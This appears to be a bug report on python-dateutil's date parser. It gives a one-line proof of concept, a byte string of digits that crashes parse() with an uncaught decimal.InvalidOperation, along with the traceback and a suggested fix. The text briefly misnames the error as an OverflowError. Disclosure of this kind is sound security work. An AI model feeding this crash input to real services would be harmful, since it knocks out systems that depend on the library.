[Crash] Unhandled DecimalException while parsing an arbitrary date leads to DoS

[pventuzelo]

The crash occurs when the parser (via the parse function) tries to decode an arbitrary user input without sanitizing it first. The library then crashes due to an unhandled OverflowError error.

PoC

// PoC.py
from dateutil.parser import parse

parse(b'9999999999999999999999999999999999999999939999999999999999999999999999:99999999999999999999999999999\n9')

Crash

Traceback (most recent call last):
  File "poc_InvalidOperation_DecimalException.py", line 3, in <module>
    parse(b'9999999999999999999999999999999999999999939999999999999999999999999999:99999999999999999999999999999\n9')
  File "/home/scop/.local/lib/python3.8/site-packages/dateutil/parser/_parser.py", line 1368, in parse
    return DEFAULTPARSER.parse(timestr, **kwargs)
  File "/home/scop/.local/lib/python3.8/site-packages/dateutil/parser/_parser.py", line 640, in parse
    res, skipped_tokens = self._parse(timestr, **kwargs)
  File "/home/scop/.local/lib/python3.8/site-packages/dateutil/parser/_parser.py", line 740, in _parse
    i = self._parse_numeric_token(l, i, info, ymd, res, fuzzy)
  File "/home/scop/.local/lib/python3.8/site-packages/dateutil/parser/_parser.py", line 942, in _parse_numeric_token
    (res.minute, res.second) = self._parse_min_sec(value)
  File "/home/scop/.local/lib/python3.8/site-packages/dateutil/parser/_parser.py", line 1106, in _parse_min_sec
    sec_remainder = value % 1
decimal.InvalidOperation: [<class 'decimal.DivisionImpossible'>]

Recommendation

To catch decimal.InvalidOperation, you need to catch DecimalException.

Impact

This vulnerability is making Python trigger an exception and crash leading to a denial of service (DoS).
Vulnerability type: CWE-248: Uncaught Exception

(I originally reported this bug through private disclosure via huntr bug bounty platform but it was closed as informative... I don't agree, it's a major library used by a lot of projects and can impact a lot of AI/ML projects as well)